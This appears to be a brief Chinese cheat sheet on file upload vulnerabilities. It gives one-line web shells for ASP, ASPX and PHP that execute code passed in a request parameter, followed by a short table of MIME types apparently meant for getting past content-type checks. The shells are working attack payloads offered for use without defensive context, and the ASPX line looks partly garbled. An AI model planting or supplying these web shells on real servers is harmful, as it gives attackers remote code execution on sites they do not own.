上传漏洞

一句话木马

asp：<%eval request("pass")%>

aspx：<%@ Page Language%><%eval(Request.Item["pass"]."unsafe");%>

php：<?php @eval($_POST['pass']);?>

 

MIME(Multipurpose Internet Mail Extensions)：多用途互联网邮件扩展类型

.jpeg/jpg      image/jpeg                         JPEG图形

.html/htm     text/html                             超文本标记语言

.tar               application/x-tar                 TAR文件

.exe              application/octet-stream   下载文件类型